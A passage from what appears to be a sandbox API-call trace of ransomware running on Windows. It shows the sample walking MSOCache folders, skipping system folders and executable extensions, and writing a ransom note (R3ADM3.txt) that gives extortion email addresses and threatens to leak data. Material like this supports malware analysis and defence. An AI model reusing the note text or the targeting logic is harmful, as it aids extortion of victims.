lpMem=0xedcf70 | out: hHeap=0xea0000) returned 1 [0148.898] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef2dd0 | out: hHeap=0xea0000) returned 1 [0148.898] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa0) returned 0xef5770 [0148.898] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xef2dd0 [0148.898] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa0) returned 0xef6e68 [0148.898] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef5770 | out: hHeap=0xea0000) returned 1 [0148.898] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf811c0 | out: hHeap=0xea0000) returned 1 [0148.899] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x131a1c00, ftCreationTime.dwHighDateTime=0x1cacdea, ftLastAccessTime.dwLowDateTime=0x131a1c00, ftLastAccessTime.dwHighDateTime=0x1cacdea, ftLastWriteTime.dwLowDateTime=0xe84c60d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ShellUI.MST", cAlternateFileName="")) returned 0 [0148.899] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedcee8 | out: hHeap=0xea0000) returned 1 [0148.899] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee2e50 | out: hHeap=0xea0000) returned 1 [0148.899] FindClose (in: hFindFile=0xecfb60 | out: hFindFile=0xecfb60) returned 1 [0148.899] Sleep (dwMilliseconds=0x32) [0148.986] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeed4d8 | out: hHeap=0xea0000) returned 1 [0148.986] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeddcb8 | out: hHeap=0xea0000) returned 1 [0148.986] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xeddcb8 [0148.986] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedcee8 [0148.986] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x90) returned 0xeed4d8 [0148.986] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedcee8 | out: hHeap=0xea0000) returned 1 [0148.986] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedcee8 [0148.986] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee2e50 [0148.986] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedcf70 [0148.986] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedccc8 [0148.986] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xbe) returned 0xf811c0 [0148.986] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedccc8 | out: hHeap=0xea0000) returned 1 [0148.986] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedcf70 | out: hHeap=0xea0000) returned 1 [0148.986] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee2e50 | out: hHeap=0xea0000) returned 1 [0148.986] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\R3ADM3.txt" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\r3adm3.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6dc [0149.383] lstrlenA (lpString="The network is LOCKED. Do not try to use other software. For decryption tool write HERE:\r\n\r\nguifullcharti1970@protonmail.com\r\nphrasitliter1981@protonmail.com\r\n\r\nIf you do not pay, we will publish private data on our news site. ") returned 227 [0149.383] WriteFile (in: hFile=0x6dc, lpBuffer=0x2825890*, nNumberOfBytesToWrite=0xe3, lpNumberOfBytesWritten=0x6fbfc38, lpOverlapped=0x0 | out: lpBuffer=0x2825890*, lpNumberOfBytesWritten=0x6fbfc38*=0xe3, lpOverlapped=0x0) returned 1 [0149.384] CloseHandle (hObject=0x6dc) returned 1 [0149.385] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf811c0 | out: hHeap=0xea0000) returned 1 [0149.385] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedcee8 | out: hHeap=0xea0000) returned 1 [0149.385] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfa13c510, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x5e0cb630, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x5e0cb630, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xecfb60 [0149.385] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0149.385] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfa13c510, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x5e0cb630, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x5e0cb630, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0149.385] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0149.385] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0149.385] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfa2b92d0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc0c6890, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc0c6890, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Access.en-us", cAlternateFileName="ACCESS~1.EN-")) returned 1 [0149.385] lstrcmpW (lpString1="Access.en-us", lpString2=".") returned 1 [0149.386] lstrcmpW (lpString1="Access.en-us", lpString2="..") returned 1 [0149.386] StrStrIW (lpFirst="Access.en-us", lpSrch="tmp") returned 0x0 [0149.386] StrStrIW (lpFirst="Access.en-us", lpSrch="winnt") returned 0x0 [0149.386] StrStrIW (lpFirst="Access.en-us", lpSrch="temp") returned 0x0 [0149.386] StrStrIW (lpFirst="Access.en-us", lpSrch="thumb") returned 0x0 [0149.386] StrStrIW (lpFirst="Access.en-us", lpSrch="$Recycle.Bin") returned 0x0 [0149.386] StrStrIW (lpFirst="Access.en-us", lpSrch="$RECYCLE.BIN") returned 0x0 [0149.386] StrStrIW (lpFirst="Access.en-us", lpSrch="System Volume Information") returned 0x0 [0149.386] StrStrIW (lpFirst="Access.en-us", lpSrch="Boot") returned 0x0 [0149.386] StrStrIW (lpFirst="Access.en-us", lpSrch="Windows") returned 0x0 [0149.386] StrStrIW (lpFirst="Access.en-us", lpSrch="Trend Micro") returned 0x0 [0149.386] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee2e50 [0149.386] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedcee8 [0149.386] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedcf70 [0149.386] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xbe) returned 0xf811c0 [0149.386] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedcf70 | out: hHeap=0xea0000) returned 1 [0149.386] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedcee8 | out: hHeap=0xea0000) returned 1 [0149.387] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee2e50 | out: hHeap=0xea0000) returned 1 [0149.387] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee2e50 [0149.387] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa0) returned 0xef5770 [0149.387] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf811c0 | out: hHeap=0xea0000) returned 1 [0149.387] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3f33d800, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3f33d800, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfa160f00, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xd4200, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AccessMUISet.msi", cAlternateFileName="ACCESS~1.MSI")) returned 1 [0149.387] lstrcmpW (lpString1="AccessMUISet.msi", lpString2=".") returned 1 [0149.387] lstrcmpW (lpString1="AccessMUISet.msi", lpString2="..") returned 1 [0149.387] StrStrIW (lpFirst="AccessMUISet.msi", lpSrch=".UAKXC") returned 0x0 [0149.387] StrStrIW (lpFirst="AccessMUISet.msi", lpSrch=".exe") returned 0x0 [0149.387] StrStrIW (lpFirst="AccessMUISet.msi", lpSrch=".dll") returned 0x0 [0149.387] StrStrIW (lpFirst="AccessMUISet.msi", lpSrch=".lnk") returned 0x0 [0149.387] StrStrIW (lpFirst="AccessMUISet.msi", lpSrch=".sys") returned 0x0 [0149.387] StrStrIW (lpFirst="AccessMUISet.msi", lpSrch=".msi") returned=".msi" [0149.387] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4529b900, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x4529b900, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfa13c510, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x333, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AccessMUISet.xml", cAlternateFileName="ACCESS~1.XML")) returned 1 [0149.387] lstrcmpW (lpString1="AccessMUISet.xml", lpString2=".") returned 1 [0149.387] lstrcmpW (lpString1="AccessMUISet.xml", lpString2="..") returned 1 [0149.387] StrStrIW (lpFirst="AccessMUISet.xml", lpSrch=".UAKXC") returned 0x0 [0149.387] StrStrIW (lpFirst="AccessMUISet.xml", lpSrch=".exe") returned 0x0 [0149.387] StrStrIW (lpFirst="AccessMUISet.xml", lpSrch=".dll") returned 0x0 [0149.387] StrStrIW (lpFirst="AccessMUISet.xml", lpSrch=".lnk") returned 0x0 [0149.387] StrStrIW (lpFirst="AccessMUISet.xml", lpSrch=".sys") returned 0x0 [0149.387] StrStrIW (lpFirst="AccessMUISet.xml", lpSrch=".msi") returned 0x0 [0149.387] StrStrIW (lpFirst="AccessMUISet.xml", lpSrch="R3ADM3.txt") returned 0x0 [0149.387] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee3f90 [0149.388] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedcee8 [0149.388] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedcf70 [0149.388] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xbe) returned 0xf811c0 [0149.388] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedcf70 | out: hHeap=0xea0000) returned 1 [0149.388] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedcee8 | out: hHeap=0xea0000) returned 1 [0149.388] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee3f90 | out: hHeap=0xea0000) returned 1 [0149.388] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa0) returned 0xef6f10 [0149.388] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xef2ce0 [0149.388] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa0) returned 0xef6fb8 [0149.388] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef6f10 | out: hHeap=0xea0000) returned 1 [0149.388] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf811c0 | out: hHeap=0xea0000) returned 1 [0149.388] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5e0cb630, ftCreationTime.dwHighDateTime=0x1d68245, ftLastAccessTime.dwLowDateTime=0x5e0cb630, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x5e0cb630, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0xe3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="R3ADM3.txt", cAlternateFileName="")) returned 1 [0149.388] lstrcmpW (lpString1="R3ADM3.txt", lpString2=".") returned 1 [0149.388] lstrcmpW (lpString1="R3ADM3.txt", lpString2="..") returned 1 [0149.388] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".UAKXC") returned 0x0 [0149.388] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".exe") returned 0x0 [0149.388] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".dll") returned 0x0 [0149.388] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".lnk") returned 0x0 [0149.388] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".sys") returned 0x0 [0149.388] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".msi") returned 0x0 [0149.388] StrStrIW (lpFirst="R3ADM3.txt", lpSrch="R3ADM3.txt") returned="R3ADM3.txt" [0149.388] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc111bb0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xa40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0149.389] lstrcmpW (lpString1="Setup.xml", lpString2=".") returned 1 [0149.389] lstrcmpW (lpString1="Setup.xml", lpString2="..") returned 1 [0149.389] StrStrIW (lpFirst="Setup.xml", lpSrch=".UAKXC") returned 0x0 [0149.389] StrStrIW (lpFirst="Setup.xml", lpSrch=".exe") returned 0x0 [0149.389] StrStrIW (lpFirst="Setup.xml", lpSrch=".dll") returned 0x0 [0149.389] StrStrIW (lpFirst="Setup.xml", lpSrch=".lnk") returned 0x0 [0149.389] StrStrIW (lpFirst="Setup.xml", lpSrch=".sys") returned 0x0 [0149.389] StrStrIW (lpFirst="Setup.xml", lpSrch=".msi") returned 0x0 [0149.389] StrStrIW (lpFirst="Setup.xml", lpSrch="R3ADM3.txt") returned 0x0 [0149.389] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xef2d30 [0149.389] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedcee8 [0149.389] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedcf70 [0149.389] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xbe) returned 0xf811c0 [0149.389] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedcf70 | out: hHeap=0xea0000) returned 1 [0149.389] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedcee8 | out: hHeap=0xea0000) returned 1 [0149.389] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef2d30 | out: hHeap=0xea0000) returned 1 [0149.389] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa0) returned 0xef6f10 [0149.389] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xef2d30 [0149.389] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa0) returned 0xef7060 [0149.389] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef6f10 | out: hHeap=0xea0000) returned 1 [0149.389] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf811c0 | out: hHeap=0xea0000) returned 1 [0149.389] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc111bb0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xa40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 0 [0149.390] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedce60 | out: hHeap=0xea0000) returned 1 [0149.390] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeeac68 | out: hHeap=0xea0000) returned 1 [0149.390] FindClose (in: hFindFile=0xecfb60 | out: hFindFile=0xecfb60) returned 1 [0149.390] Sleep (dwMilliseconds=0x32) [0149.557] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeed4d8 | out: hHeap=0xea0000) returned 1 [0149.557] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeddcb8 | out: hHeap=0xea0000) returned 1 [0149.558] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xeddcb8 [0149.558] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedce60 [0149.558] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x90) returned 0xeed4d8 [0149.558] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedce60 | out: hHeap=0xea0000) returned 1 [0149.558] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedce60 [0149.558] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeeac68 [0149.558] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedcee8 [0149.558] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedcf70 [0149.558] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xbe) returned 0xf811c0 [0149.558] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedcf70 | out: hHeap=0xea0000) returned 1 [0149.558] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedcee8 | out: hHeap=0xea0000) returned 1 [0149.558] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeeac68 | out: hHeap=0xea0000) returned 1 [0149.558] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\R3ADM3.txt" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\r3adm3.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6dc [0149.637] lstrlenA (lpString="The network is LOCKED. Do not try to use other software. For decryption tool write HERE:\r\n\r\nguifullcharti1970@protonmail.com\r\nphrasitliter1981@protonmail.com\r\n\r\nIf you do not pay, we will publish private data on our news site. ") returned 227 [0149.637] WriteFile (in: hFile=0x6dc, lpBuffer=0x2825890*, nNumberOfBytesToWrite=0xe3, lpNumberOfBytesWritten=0x6fbfc38, lpOverlapped=0x0 | out: lpBuffer=0x2825890*, lpNumberOfBytesWritten=0x6fbfc38*=0xe3, lpOverlapped=0x0) returned 1 [0149.638] CloseHandle (hObject=0x6dc) returned 1 [0149.639] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf811c0 | out: hHeap=0xea0000) returned 1 [0149.639] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedce60 | out: hHeap=0xea0000) returned 1 [0149.639] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\*", lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfe09ced0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x5e352d90, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x5e352d90, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xecfb60 [0149.639] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0149.639] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfe09ced0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x5e352d90, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x5e352d90, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0149.639] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0149.639] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0149.639] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x34ae1a00, ftCreationTime.dwHighDateTime=0x1cad01b, ftLastAccessTime.dwLowDateTime=0x34ae1a00, ftLastAccessTime.dwHighDateTime=0x1cad01b, ftLastWriteTime.dwLowDateTime=0xfe0c2860, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x1e6600, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Office32WW.msi", cAlternateFileName="OFFICE~1.MSI")) returned 1 [0149.639] lstrcmpW (lpString1="Office32WW.msi", lpString2=".") returned 1 [0149.639] lstrcmpW (lpString1="Office32WW.msi", lpString2="..") returned 1 [0149.639] StrStrIW (lpFirst="Office32WW.msi", lpSrch=".UAKXC") returned 0x0 [0149.640] StrStrIW (lpFirst="Office32WW.msi", lpSrch=".exe") returned 0x0 [0149.640] StrStrIW (lpFirst="Office32WW.msi", lpSrch=".dll") returned 0x0 [0149.640] StrStrIW (lpFirst="Office32WW.msi", lpSrch=".lnk") returned 0x0 [0149.640] StrStrIW (lpFirst="Office32WW.msi", lpSrch=".sys") returned 0x0 [0149.640] StrStrIW (lpFirst="Office32WW.msi", lpSrch=".msi") returned=".msi" [0149.640] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x940c2a00, ftCreationTime.dwHighDateTime=0x1cad01b, ftLastAccessTime.dwLowDateTime=0x940c2a00, ftLastAccessTime.dwHighDateTime=0x1cad01b, ftLastWriteTime.dwLowDateTime=0xfe09b760, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x10b2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Office32WW.xml", cAlternateFileName="OFFICE~1.XML")) returned 1 [0149.640] lstrcmpW (lpString1="Office32WW.xml", lpString2=".") returned 1 [0149.640] lstrcmpW (lpString1="Office32WW.xml", lpString2="..") returned 1 [0149.640] StrStrIW (lpFirst="Office32WW.xml", lpSrch=".UAKXC") returned 0x0 [0149.640] StrStrIW (lpFirst="Office32WW.xml", lpSrch=".exe") returned 0x0 [0149.640] StrStrIW (lpFirst="Office32WW.xml", lpSrch=".dll") returned 0x0 [0149.640] StrStrIW (lpFirst="Office32WW.xml", lpSrch=".lnk") returned 0x0 [0149.640] StrStrIW (lpFirst="Office32WW.xml", lpSrch=".sys") returned 0x0 [0149.640] StrStrIW (lpFirst="Office32WW.xml", lpSrch=".msi") returned 0x0 [0149.640] StrStrIW (lpFirst="Office32WW.xml", lpSrch="R3ADM3.txt") returned 0x0 [0149.640] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeeac68 [0149.640] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedce60 [0149.640] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedcee8 [0149.640] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xbe) returned 0xf811c0 [0149.641] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedcee8 | out: hHeap=0xea0000) returned 1 [0149.641] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedce60 | out: hHeap=0xea0000) returned 1 [0149.641] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeeac68 | out: hHeap=0xea0000) returned 1 [0149.641] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa0) returned 0xef6f10 [0149.641] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeeac68 [0149.641] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa0) returned 0xef7108 [0149.641] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef6f10 | out: hHeap=0xea0000) returned 1 [0149.641] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf811c0 | out: hHeap=0xea0000) returned 1 [0149.641] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf885a000, ftCreationTime.dwHighDateTime=0x1cac4d7, ftLastAccessTime.dwLowDateTime=0xf885a000, ftLastAccessTime.dwHighDateTime=0x1cac4d7, ftLastWriteTime.dwLowDateTime=0x17c42c30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x2a968, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ose.exe", cAlternateFileName="")) returned 1 [0149.641] lstrcmpW (lpString1="ose.exe", lpString2=".") returned 1 [0149.641] lstrcmpW (lpString1="ose.exe", lpString2="..") returned 1 [0149.641] StrStrIW (lpFirst="ose.exe", lpSrch=".UAKXC") returned 0x0 [0149.641] StrStrIW (lpFirst="ose.exe", lpSrch=".exe") returned=".exe" [0149.641] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbd900f00, ftCreationTime.dwHighDateTime=0x1cac15b, ftLastAccessTime.dwLowDateTime=0xbd900f00, ftLastAccessTime.dwHighDateTime=0x1cac15b, ftLastWriteTime.dwLowDateTime=0x16854390, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x709768, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="osetup.dll", cAlternateFileName="")) returned 1 [0149.641] lstrcmpW (lpString1="osetup.dll", lpString2=".") returned 1 [0149.641] lstrcmpW (lpString1="osetup.dll", lpString2="..") returned 1 [0149.641] StrStrIW (lpFirst="osetup.dll", lpSrch=".UAKXC") returned 0x0 [0149.641] StrStrIW (lpFirst="osetup.dll", lpSrch=".exe") returned 0x0 [0149.641] StrStrIW (lpFirst="osetup.dll", lpSrch=".dll") returned=".dll" [0149.641] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: 